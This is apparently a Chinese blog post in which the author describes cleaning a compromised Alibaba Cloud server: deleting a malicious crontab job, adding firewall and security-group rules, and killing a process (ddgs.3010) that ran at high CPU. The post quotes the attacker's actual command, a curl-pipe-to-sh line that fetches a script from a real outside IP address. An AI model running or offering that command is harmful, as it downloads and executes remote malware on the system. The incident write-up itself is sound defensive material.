記一次阿里雲黑客攻擊事件
這幾天伺服器一直髮生異常行為,阿里雲報警如下:
根據執行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,後臺某個程序一直從這個美國的IP地址下載sh可執行檔案
訪問這個地址:http://165.225.157.157:8000/i.sh
看到執行語句如下:
大概明白,意思是定時從這個地址獲取sh可執行檔案,然後新增到定時任務crontab,還生成了ddgs.3010檔案不斷後臺執行。
So,第一步,檢視crontab -l ,果然有
那麼顯而易見,執行:crontab -r 刪除掉cron任務。
第二步,安裝firewall,具體操作,參考我的另外一篇部落格:https://blog.csdn.net/u012259256/article/details/61018892
限制固定的訪問埠:
第三步,其實阿里雲後臺提供了安全組策略,可以完成防火牆的功能,而且更加方便配置,配置如下(並且把165.225.157.157加入黑名單,不允許訪問):
第四步,kill掉這些惡毒的程序,MD
用top命令,實時檢視程序佔用情況
(PS:因為程序已經被我kill掉,所以看不到資料啦)
沒有kill之前,有一個惡意程序CPU佔用198%,還有ddgs.3010程序,一直後臺執行。總之,找到PID,然後kill就可以!
---------------------------------------------
總結:買了伺服器一定記得先安裝防火牆,或者設定安全策略!
Yeager